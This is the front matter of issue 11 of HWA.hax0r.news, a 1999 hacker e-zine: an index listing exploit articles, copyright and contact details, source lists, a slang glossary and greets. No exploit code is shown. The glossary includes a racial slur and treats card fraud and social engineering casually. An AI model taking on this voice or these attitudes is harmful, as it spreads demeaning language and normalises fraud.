home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / library / hack99 / HWA-hn11.txt < prev    next >
Encoding:
Text File  |  1999-03-26  |  393.0 KB  |  9,060 lines

  1.     [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  2.   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  3.   ==========================================================================
  4.   =                       <=-[ HWA.hax0r.news ]-=>                         =
  5.   ==========================================================================
  6.     [=HWA'99=]                         Number 11 Volume 1 1999 March 24th 99
  7.   ==========================================================================
  8.  
  9.  
  10.    Anyone want to send in comments on the current site or ideas for a new 
  11.    site layout, please do so, i'm no html wizard and all my sites tend to
  12.    end up looking pretty much the same, if you feel creative and want to put
  13.    a demo  site together or point  me in the direction of a site layout you 
  14.    like please do so, i'm getting bored with the haphazard layout of the 
  15.    current site and could use some  creative input on ideas for layout as
  16.    its a bit crowded currently and only looks half decent in 1024x768 
  17.    mode .... tnx  
  18.    
  19.                   - cruciphux@dok.org
  20.  
  21.      
  22.    Synopsis
  23.    --------
  24.  
  25.    The purpose of this newsletter is to 'digest' current events of interest
  26.    that affect the online underground and netizens in general. This includes
  27.    coverage of general security issues, hacks, exploits, underground news
  28.    and anything else I think is worthy of a look see.
  29.  
  30.     This list is NOT meant as a replacement for, nor to compete with, the
  31.    likes of publications such as CuD or PHRACK or with news sites such as
  32.    AntiOnline, the Hacker News Network (HNN) or mailing lists such as
  33.    BUGTRAQ or ISN nor could any other 'digest' of this type do so.
  34.  
  35.     It *is* intended  however, to  compliment such material and provide a
  36.    reference to those who follow the culture by keeping tabs on as many
  37.    sources as possible and providing links to further info, its a labour
  38.    of love and will be continued for as long as I feel like it, i'm not
  39.    motivated by dollars or the illusion of fame, did you ever notice how
  40.    the most famous/infamous hackers are the ones that get caught? there's
  41.    a lot to be said for remaining just outside the circle... <g>
  42.  
  43.  
  44.    @HWA
  45.  
  46.    =-----------------------------------------------------------------------=
  47.  
  48.                      Welcome to HWA.hax0r.news ... #11
  49.  
  50.    =-----------------------------------------------------------------------=
  51.  
  52.           
  53.  
  54.     *******************************************************************
  55.     ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
  56.     ***                                                             ***
  57.     *** please join to discuss or impart news on techno/phac scene  ***
  58.     *** stuff or just to hang out ... someone is usually around 24/7***
  59.     ***                                                             ***
  60.     *** Note that the channel isn't there to entertain you its for  ***
  61.     *** you to talk to us and impart news, if you're looking for fun***
  62.     *** then do NOT join our channel try #wierdwigs or something... ***
  63.     *** we're not #chatzone or #hack                                ***
  64.     ***                                                             ***
  65.     *******************************************************************
  66.  
  67.  
  68.   =-------------------------------------------------------------------------=
  69.  
  70.   Issue #11
  71.  
  72.  
  73.   =--------------------------------------------------------------------------=
  74.  
  75.  
  76.  
  77.   
  78.   [ INDEX ]
  79.   =--------------------------------------------------------------------------=
  80.     Key     Content                                                         
  81.   =--------------------------------------------------------------------------=
  82.  
  83.     00.0  .. COPYRIGHTS ......................................................
  84.     00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
  85.     00.2  .. SOURCES .........................................................
  86.     00.3  .. THIS IS WHO WE ARE ..............................................
  87.     00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
  88.     00.5  .. THE HWA_FAQ V1.0 ................................................
  89.  
  90.     01.0  .. GREETS ..........................................................
  91.      01.1 .. Last minute stuff, rumours, newsbytes ...........................
  92.      01.2 .. Mailbag .........................................................
  93.     02.0  .. From the editor..................................................
  94.   =--------------------------------------------------------------------------=
  95.     03.0  .. MSIE 5 is still susceptible to frame spoofing and other bugs.....
  96.      03.1  .. MSIE 5 problems carried over from earlier versions..............
  97.     04.0  .. WintrasherGOLD...................................................
  98.     05.0  .. LDAP Buffer overflow.............................................
  99.     06.0  .. HP security bulletin: HPTerm exploit.............................
  100.     07.0  .. Eudora buffer overflow exploit...................................
  101.     08.0  .. Netscape SUSE crash exploit......................................
  102.     09.0  .. Hotmail to fix potential security problem .......................
  103.     10.0  .. NcFTPd Exploit (from Feb but missed in earlier issues)...........
  104.      10.1  .. NcFTPd proxy exploitation.......................................
  105.      10.2  .. Mail.local sendmail exploit advisory............................
  106.     11.0  .. Its in the bag, much ado about nothing ..........................
  107.     12.0  .. [ISN] DNS Spoofing finally resolved?.............................
  108.     13.0  .. [ISN] IETF working group  seeks to improve security alerting ....
  109.     14.0  .. Report: Military computers vulnerable............................
  110.     15.0  .. International raid cracks child porn ring .......................
  111.      15.1  .. ACPM : Anti-Child Porn Militia wants YOU........................
  112.     16.0  .. Hacking (Cracking) contest, win a Netfinity server!..............
  113.     17.0  .. eBay owned.......................................................
  114.     18.0  .. Aussies to ban Net pr0n..........................................
  115.     19.0  .. More on the ProMail email trojan program ........................
  116.     20.0  .. C41 - PentagonÆs cyberdefenses criticized........................
  117.     21.0  .. [ISN] NetBus 'Trojan' Splits Security Community..................
  118.     22.0  .. [ISN] Cracking tools get smarter ................................
  119.     23.0  .. [ISN] British Defense Ministry Dismisses Hacker Report...........       
  120.     24.0  .. [ISN] Encryption key would lock up criminals.....................
  121.     25.0  .. [ISN] Crypto: Under lock and key ................................
  122.     26.0  .. HRC's interview with Goat Security (IRC LOG).....................
  123.     27.0  .. Year 2000 Network and Distributed System Security ...............
  124.     28.0  .. What would YOU do with Bill Gates' SSN?..........................
  125.     29.0  .. MDT monitoring (Mobile Data Terminal as used by the Police)......
  126.     30.0  .. Bugtraq: Lotus notes security advisory...........................
  127.     31.1  .. WU-FTPD REMOTE EXPLOIT Version wu-2.4.2-academ[BETA-18](1).......
  128.     32.0  .. Bugtraq: OpenSSL and SSLeay Advisory.............................
  129.     33.0  .. OpenBSD security advisories......................................
  130.     34.0  .. Oracle in insecure at initial install............................
  131.     35.0  .. GnuPlot buffer overflow exploit .................................
  132.     
  133.     =--------------------------------------------------------------------------=   
  134.     AD.S  .. Post your site ads or etc here, if you can offer something in return
  135.              thats tres cool, if not we'll consider ur ad anyways so send it in.
  136.     ..........................................................................
  137.     HA.HA  .. Humour and puzzles  ............................................
  138.     HA.HA1 .. Humourous newsbytes from Innerpulse.com    (www.innerpulse.com). 
  139.     ..........................................................................
  140.     HOW.TO .. New section: "How to hack" by our illustrious editor part 2.....
  141.     SITE.1 .. Featured site, http://www.real-secure.org/ with ezine excerpt...
  142.               on IP Spoofing .................................................
  143.     ..........................................................................
  144.      H.W    .. Hacked Websites  ..............................................
  145.      A.0   .. APPENDICES......................................................
  146.      A.1   .. PHACVW linx and references......................................
  147.  
  148.   =--------------------------------------------------------------------------=
  149.      
  150.      @HWA'99
  151.  
  152.      "Heh heh heh heh heh,.why don't you listen to this recording with
  153.        interest? Mary Mary, kill the hairy sonuvabitch...he he he and 
  154.         now for something completely different" - Wierdmix'90
  155.  
  156.  
  157.  
  158.   00.0  (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
  159.         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  160.  
  161.      THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
  162.      OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
  163.      WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
  164.      (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
  165.      READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
  166.  
  167.      Important semi-legalese and license to redistribute:
  168.  
  169.      YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
  170.      AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
  171.      ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
  172.      IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
  173.      APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
  174.      IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
  175.      ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
  176.      ME PRIVATELY current email cruciphux@dok.org
  177.  
  178.      THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
  179.      WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
  180.      THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
  181.  
  182.      I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
  183.      AND REDISTRIBUTE/MIRROR. - EoD
  184.  
  185.  
  186.      Although this file and all future issues are now copyright, some of
  187.     the content holds its  own copyright and these are printed and
  188.     respected. News is news so i'll print any and all news but will quote
  189.     sources when the source is known, if its good enough for CNN its good
  190.     enough for me. And i'm doing it for free on my own time so pfffft. :)
  191.  
  192.     No monies are made or sought through the distribution of this material.
  193.     If you have a problem or concern email me and we'll discuss it.
  194.  
  195.     cruciphux@dok.org
  196.  
  197.     Cruciphux [C*:.]
  198.  
  199.  
  200.  
  201.   00.1  CONTACT INFORMATION AND MAIL DROP
  202.         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  203.  
  204.        Has it occurred to anybody that "AOL for Dummies" is an extremely
  205.        redundant name for a book?
  206.                                       - unknown
  207.  
  208.  
  209.      Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
  210.     Canada / North America (hell even if you are inside ..) and wish to
  211.     send printed matter like newspaper clippings a subscription to your
  212.     cool foreign hacking zine or photos, small non-explosive packages
  213.     or sensitive information etc etc well, now you can. (w00t) please
  214.     no more inflatable sheep or plastic dog droppings, or fake vomit
  215.     thanks.
  216.  
  217.     Send all goodies to:
  218.  
  219.         HWA NEWS
  220.         P.O BOX 44118
  221.         370 MAIN ST. NORTH
  222.         BRAMPTON, ONTARIO
  223.         CANADA
  224.         L6V 4H5
  225.  
  226.     WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
  227.     ~~~~~~~  reading this from some interesting places, make my day and get a
  228.              mention in the zine, send in a postcard, I realize that some places
  229.              it is cost prohibitive but if you have the time and money be a cool
  230.              dude / gal and send a poor guy a postcard preferably one that has some
  231.              scenery from your place of residence for my collection, I collect stamps
  232.              too so you kill two birds with one stone by being cool and mailing in a
  233.              postcard, return address not necessary, just a  "hey guys being cool in
  234.              Bahrain, take it easy" will do ... ;-) thanx.
  235.  
  236.  
  237.  
  238.     Ideas for interesting 'stuff' to send in apart from news:
  239.  
  240.     - Photo copies of old system manual front pages (optionally signed by you) ;-)
  241.     - Photos of yourself, your mom, sister, dog and or cat in a NON
  242.       compromising position plz I don't want pr0n. <g>
  243.     - Picture postcards
  244.     - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
  245.       tapes with hack/security related archives, logs, irc logs etc on em.
  246.     - audio or video cassettes of yourself/others etc of interesting phone
  247.       fun or social engineering examples or transcripts thereof.
  248.  
  249.     If you still can't think of anything you're probably not that interesting
  250.     a person after all so don't worry about it <BeG>
  251.  
  252.     Our current email:
  253.  
  254.     Submissions/zine gossip.....: hwa@press.usmc.net
  255.     Private email to editor.....: cruciphux@dok.org
  256.     Distribution/Website........: sas72@usa.net
  257.  
  258.     @HWA
  259.  
  260.  
  261.  
  262.   00.2  Sources ***
  263.         ~~~~~~~~~~~
  264.  
  265.      Sources can be some, all, or none of the following (by no means complete
  266.     nor listed in any degree of importance) Unless otherwise noted, like msgs
  267.     from lists or news from other sites, articles and information is compiled
  268.     and or sourced by Cruciphux no copyright claimed.
  269.  
  270.     HiR:Hackers Information Report... http://axon.jccc.net/hir/
  271.     News & I/O zine ................. http://www.antionline.com/
  272.     Back Orifice/cDc..................http://www.cultdeadcow.com/
  273.     News site (HNN) .....,............http://www.hackernews.com/
  274.     Help Net Security.................http://net-security.org/
  275.     News,Advisories,++ ...............http://www.l0pht.com/
  276.     NewsTrolls (HNN)..................http://www.newstrolls.com/
  277.     News + Exploit archive ...........http://www.rootshell.com/beta/news.html
  278.     CuD ..............................http://www.soci.niu.edu/~cudigest
  279.     News site+........................http://www.zdnet.com/
  280.     News site+........................http://www.gammaforce.org/
  281.     News site+........................http://www.projectgamma.com/
  282.  
  283.  
  284.     +Various mailing lists and some newsgroups, such as ...
  285.     +other sites available on the HNN affiliates page, please see
  286.      http://www.hackernews.com/affiliates.html as they seem to be popping up
  287.      rather frequently ...
  288.  
  289.     * Yes demoniz is now officially retired, if you go to that site though the
  290.      Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will
  291.      also be hosting a webboard as soon as that site comes online perhaps you can
  292.      visit it and check us out if I can get some decent wwwboard code running I
  293.      don't really want to write my own, another alternative being considered is a
  294.      telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux
  295.  
  296.     http://www.the-project.org/ .. IRC list/admin archives
  297.     http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk
  298.  
  299.     alt.hackers.malicious
  300.     alt.hackers
  301.     alt.2600
  302.     BUGTRAQ
  303.     ISN security mailing list
  304.     ntbugtraq
  305.     <+others>
  306.  
  307.     NEWS Agencies, News search engines etc:
  308.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  309.     http://www.cnn.com/SEARCH/
  310.     http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0
  311.     http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker
  312.     http://www.ottawacitizen.com/business/
  313.     http://search.yahoo.com.sg/search/news_sg?p=cracker
  314.     http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker
  315.     http://www.zdnet.com/zdtv/cybercrime/
  316.     http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
  317.  
  318.     NOTE: See appendices for details on other links.
  319.  
  320.  
  321.     http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
  322.     http://freespeech.org/eua/ Electronic Underground Affiliation
  323.     http://www.l0pht.com/cyberul.html
  324.     http://www.hackernews.com/archive.html?122998.html
  325.     http://ech0.cjb.net ech0 Security
  326.     http://net-security.org Net Security
  327.  
  328.     ...
  329.  
  330.  
  331.     Submissions/Hints/Tips/Etc
  332.     ~~~~~~~~~~~~~~~~~~~~~~~~~~
  333.  
  334.     All submissions that are `published' are printed with the credits
  335.     you provide, if no response is received by a week or two it is assumed
  336.     that you don't care wether the article/email is to be used in an issue
  337.     or not and may be used at my discretion.
  338.  
  339.     Looking for:
  340.  
  341.     Good news sites that are not already listed here OR on the HNN affiliates
  342.     page at http://www.hackernews.com/affiliates.html
  343.  
  344.     Magazines (complete or just the articles) of breaking sekurity or hacker
  345.     activity in your region, this includes telephone phraud and any other
  346.     technological use, abuse hole or cool thingy. ;-) cut em out and send it
  347.     to the drop box.
  348.  
  349.  
  350.     - Ed
  351.  
  352.     Mailing List Subscription Info   (Far from complete)         Feb 1999
  353.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~
  354.  
  355.     ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
  356.  
  357.  
  358.     THE MOST READ:
  359.  
  360.     BUGTRAQ - Subscription info
  361.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  362.  
  363.     What is Bugtraq?
  364.  
  365.     Bugtraq is a full-disclosure UNIX security mailing list, (see the info
  366.     file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
  367.     bugtraq, send mail to listserv@netspace.org containing the message body
  368.     subscribe bugtraq. I've been archiving this list on the web since late
  369.     1993. It is searchable with glimpse and archived on-the-fly with hypermail.
  370.  
  371.     Searchable Hypermail Index;
  372.  
  373.           http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
  374.  
  375.  
  376.  
  377.     About the Bugtraq mailing list
  378.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  379.  
  380.     The following comes from Bugtraq's info file:
  381.  
  382.     This list is for *detailed* discussion of UNIX security holes: what they are,
  383.     how to exploit, and what to do to fix them.
  384.  
  385.     This list is not intended to be about cracking systems or exploiting their
  386.     vulnerabilities. It is about defining, recognizing, and preventing use of
  387.     security holes and risks.
  388.  
  389.     Please refrain from posting one-line messages or messages that do not contain
  390.     any substance that can relate to this list`s charter.
  391.  
  392.     I will allow certain informational posts regarding updates to security tools,
  393.     documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
  394.     on this list.
  395.  
  396.     Please follow the below guidelines on what kind of information should be posted
  397.     to the Bugtraq list:
  398.  
  399.     + Information on Unix related security holes/backdoors (past and present)
  400.     + Exploit programs, scripts or detailed processes about the above
  401.     + Patches, workarounds, fixes
  402.     + Announcements, advisories or warnings
  403.     + Ideas, future plans or current works dealing with Unix security
  404.     + Information material regarding vendor contacts and procedures
  405.     + Individual experiences in dealing with above vendors or security organizations
  406.     + Incident advisories or informational reporting
  407.  
  408.     Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
  409.     reflector address if the response does not meet the above criteria.
  410.  
  411.     Remember: YOYOW.
  412.  
  413.     You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
  414.     those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
  415.  
  416.     For questions or comments, please mail me:
  417.     chasin@crimelab.com (Scott Chasin)
  418.  
  419.  
  420.     
  421.     Crypto-Gram
  422.     ~~~~~~~~~~~
  423.  
  424.        CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
  425.       insights, and commentaries on cryptography and computer security.
  426.  
  427.       To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
  428.       blank message to crypto-gram-subscribe@chaparraltree.com.á To unsubscribe,
  429.       visit http://www.counterpane.com/unsubform.html.á Back issues are available
  430.       on http://www.counterpane.com.
  431.  
  432.        CRYPTO-GRAM is written by Bruce Schneier.á Schneier is president of
  433.       Counterpane Systems, the author of "Applied Cryptography," and an inventor
  434.       of the Blowfish, Twofish, and Yarrow algorithms.á He served on the board of
  435.       the International Association for Cryptologic Research, EPIC, and VTW.á He
  436.       is a frequent writer and lecturer on cryptography.
  437.  
  438.  
  439.     CUD Computer Underground Digest
  440.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  441.     This info directly from their latest ish:
  442.  
  443.     Computer underground Digestááá Suná 14 Feb, 1999áá Volume 11 : Issue 09
  444. ááááá
  445. ááááááááááááááááááááá ISSNá 1004-042X
  446.  
  447. áááááá Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
  448. áááááá News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
  449. áááááá Archivist: Brendan Kehoe
  450. áááááá Poof Reader:áá Etaion Shrdlu, Jr.
  451. áááááá Shadow-Archivists: Dan Carosone / Paul Southworth
  452. ááááááááááááááááááááááááá Ralph Sims / Jyrki Kuoppala
  453. ááááááááááááááááááááááááá Ian Dickinson
  454. áááááá Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
  455.  
  456.  
  457.  
  458.     [ISN] Security list
  459.     ~~~~~~~~~~~~~~~~~~~
  460.     This is a low volume list with lots of informative articles, if I had my
  461.     way i'd reproduce them ALL here, well almost all .... ;-) - Ed
  462.  
  463.  
  464.     Subscribe: mail majordomo@repsec.com with "subscribe isn".
  465.  
  466.  
  467.  
  468.     @HWA
  469.  
  470.  
  471.   00.3  THIS IS WHO WE ARE
  472.         ~~~~~~~~~~~~~~~~~~
  473.  
  474.       Some HWA members and Legacy staff
  475.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  476.       cruciphux@dok.org.........: currently active/editorial
  477.       darkshadez@ThePentagon.com: currently active/man in black
  478.       fprophet@dok.org..........: currently active/IRC+ man in black
  479.       sas72@usa.net ............. currently active/IRC+ distribution
  480.       vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
  481.       dicentra...(email withheld): IRC+ grrl in black
  482.  
  483.  
  484.       Foreign Correspondants/affiliate members
  485.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  486.       ATTENTION: All foreign correspondants please check in or be removed by next
  487.       issue  I need  your current emails since contact info was recently lost in a
  488.       HD mishap and i'm not carrying any deadweight. Plus we need more people sending
  489.       in info, my apologies for not getting back to you if you sent in January I lost
  490.       it, please resend.
  491.  
  492.  
  493.  
  494.        N0Portz ..........................: Australia
  495.        Qubik ............................: United Kingdom
  496.        system error .....................: Indonesia
  497.        Wile (wile coyote) ...............: Japan/the East
  498.        Ruffneck  ........................: Netherlands/Holland
  499.  
  500.        And unofficially yet contributing too much to ignore ;)
  501.  
  502.        Spikeman .........................: World media
  503.  
  504.        Please send in your sites for inclusion here if you haven't already
  505.        also if you want your emails listed send me a note ... - Ed
  506.  
  507.       http://www.genocide2600.com/~spikeman/  .. Spikeman's DoS and protection site
  508.  
  509.  
  510.      Contributors to this issue:
  511.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  512.        Spikeman .........................: daily news updates+
  513.  
  514.        *******************************************************************
  515.        ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
  516.        *******************************************************************
  517.  
  518.     :-p
  519.  
  520.  
  521.     1. We do NOT work for the government in any shape or form.Unless you count paying
  522.        taxes ... in which case we work for the gov't in a BIG WAY. :-/
  523.  
  524.     2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
  525.        events its a good idea to check out issue #1 at least and possibly also the
  526.        Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
  527.  
  528.  
  529.     @HWA
  530.  
  531.  
  532.  
  533.   00.4  Whats in a name? why HWA.hax0r.news??
  534.         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  535.       
  536.       
  537.             "Can I see you naked?" 
  538.             
  539.                              - Bob Barker
  540.                              
  541.                              
  542.       
  543.       Well what does HWA stand for? never mind if you ever find out I may
  544.      have to get those hax0rs from 'Hackers' or the Pretorians after you.
  545.  
  546.      In case you couldn't figure it out hax0r is "new skewl" and although
  547.      it is laughed at, shunned, or even pidgeon holed with those 'dumb
  548.      leet (l33t?) dewds' <see article in issue #4> this is the state
  549.      of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
  550.      up  and comers, i'd highly recommend you get that book. Its almost
  551.      like  buying a clue. Anyway..on with the show .. - Editorial staff
  552.  
  553.  
  554.      @HWA
  555.  
  556.   00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
  557.         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  558.  
  559.     Also released in issue #3. (revised) check that issue for the faq
  560.     it won't be reprinted unless changed in a big way with the exception
  561.     of the following excerpt from the FAQ, included to assist first time
  562.     readers:
  563.  
  564.     Some of the stuff related to personal useage and use in this zine are
  565.     listed below: Some are very useful, others attempt to deny the any possible
  566.     attempts at eschewing obfuscation by obsucuring their actual definitions.
  567.  
  568.     @HWA   - see EoA  ;-)
  569.  
  570.     !=     - Mathematical notation "is not equal to" or "does not equal"
  571.              ASC(247)  "wavey equals" sign means "almost equal" to. If written
  572.              an =/= (equals sign with a slash thru it) also means !=, =< is Equal
  573.              to or less than and =>  is equal to or greater than (etc, this aint
  574.              fucking grade school, cripes, don't believe I just typed all that..)
  575.  
  576.     AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
  577.  
  578.     AOL    - A great deal of people that got ripped off for net access by a huge
  579.              clueless isp with sekurity that you can drive buses through, we're
  580.              not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
  581.              least they could try leasing one??
  582.  
  583.    *CC     - 1 - Credit Card (as in phraud)
  584.              2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
  585.  
  586.     CCC    - Chaos Computer Club (Germany)
  587.  
  588.    *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
  589.              ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
  590.              watch videos and seminars, get drunk, listen to speakers, and last but
  591.              not least, get drunk.
  592.    *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
  593.                  speak he's the guy that breaks into systems and is often (but by no
  594.                  means always) a "script kiddie" see pheer
  595.               2 . An edible biscuit usually crappy tasting without a nice dip, I like
  596.                   jalapeno pepper dip or chives sour cream and onion, yum - Ed
  597.  
  598.     Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
  599.               Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
  600.               ebonics, speaking in a dark tongue ... being ereet, see pheer
  601.  
  602.     EoC    - End of Commentary
  603.  
  604.     EoA    - End of Article or more commonly @HWA
  605.  
  606.     EoF    - End of file
  607.  
  608.     EoD    - End of diatribe (AOL'ers: look it up)
  609.  
  610.     FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
  611.             usually in general media articles not high brow articles such as ours or other
  612.             HNN affiliates ;)
  613.  
  614.     du0d   - a small furry animal that scurries over keyboards causing people to type
  615.              wierd crap on irc, hence when someone says something stupid or off topic
  616.              'du0d wtf are you talkin about' may be used.
  617.  
  618.    *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
  619.  
  620.    *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
  621.             define, I think it is best defined as pop culture's view on The Hacker ala
  622.             movies such as well erhm "Hackers" and The Net etc... usually used by "real"
  623.             hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
  624.             some coffee?' or can you hax0r some bread on the way to the table please?'
  625.  
  626.             2 - A tool for cutting sheet metal.
  627.  
  628.     HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
  629.              time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
  630.              noun means the hackernews site proper. k? k. ;&
  631.  
  632.     HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
  633.  
  634.     J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d
  635.  
  636.     MFI/MOI- Missing on/from IRC
  637.  
  638.     NFC   - Depends on context: No Further Comment or No Fucking Comment
  639.  
  640.     NFR   - Network Flight Recorder (Do a websearch) see 0wn3d
  641.  
  642.     NFW   - No fuckin'way
  643.  
  644.    *0WN3D - You are cracked and owned by an elite entity see pheer
  645.    *OFCS  - Oh for christ's sakes
  646.  
  647.     PHACV - And variations of same <coff>
  648.             Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
  649.  
  650.           Alternates: H - hacking, hacktivist
  651.                       C - Cracking <software>
  652.                       C - Cracking <systems hacking>
  653.                       V - Virus
  654.                       W - Warfare <cyberwarfare usually as in Jihad>
  655.                      CT - Cyber Terrorism
  656.  
  657.    *PHEER -  This is what you do when an ereet or elite person is in your presence
  658.             see 0wn3d
  659.  
  660.    *RTFM  - Read the fucking manual - not always applicable since some manuals are
  661.             pure shit but if the answer you seek is indeed in the manual then you
  662.             should have RTFM you dumb ass.
  663.  
  664.     TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0
  665.  
  666.     TBA   - To Be Arranged/To Be Announced also 2ba
  667.  
  668.     TFS   - Tough fucking shit.
  669.  
  670.    *w00t  - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
  671.             from the underground masses. also "w00ten" <sic>
  672.  
  673.             2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
  674.  
  675.     *wtf  - what the fuck
  676.  
  677.     *ZEN  - The state you reach when you *think* you know everything (but really don't)
  678.             usually shortly after reaching the ZEN like state something will break that
  679.             you just 'fixed' or tweaked.
  680.             
  681.      @HWA            
  682.      
  683.      
  684.                             -=-    :.    .:        -=-
  685.                             
  686.                             
  687.                             
  688.  
  689.   01.0  Greets!?!?! yeah greets! w0w huh. - Ed
  690.         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  691.  
  692.      Thanks to all in the community for their support and interest but i'd
  693.      like to see more reader input, help me out here, whats good, what sucks
  694.      etc, not that I guarantee i'll take any notice mind you, but send in
  695.      your thoughts anyway.
  696.  
  697.  
  698.      Shouts to:
  699.  
  700.        * Kevin Mitnick       * demoniz          * The l0pht crew
  701.        * tattooman           * Dicentra         * Pyra
  702.        * Vexxation           * FProphet         * TwistedP
  703.        * NeMstah             * the readers      * mj
  704.        * Kokey               * ypwitch          * kimmie
  705.        * tsal                * spikeman         * YOU.
  706.  
  707.        * #leetchans ppl, you know who you are...
  708.  
  709.        * all the people who sent in cool emails and support
  710.        * our new 'staff' members.
  711.  
  712.  
  713.  
  714.      kewl sites:
  715.  
  716.      + http://www.freshmeat.net/
  717.      + http://www.slashdot.org/
  718.      + http://www.l0pht.com/
  719.      + http://www.2600.com/
  720.      + http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/)
  721.      + http://www.legions.org/
  722.      + http://www.genocide2600.com/
  723.      + http://www.genocide2600.com/~spikeman/
  724.      + http://www.genocide2600.com/~tattooman/
  725.      + http://www.hackernews.com/ (Went online same time we started issue 1!)
  726.  
  727.      @HWA
  728.  
  729.  
  730.   01.1  Last minute stuff, rumours and newsbytes
  731.         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  732.  
  733.        "What is popular isn't always right, and what is right isn't
  734.          always popular..."
  735.                            - FProphet '99
  736.                            
  737.                            
  738.                            
  739.                            
  740.      
  741.  
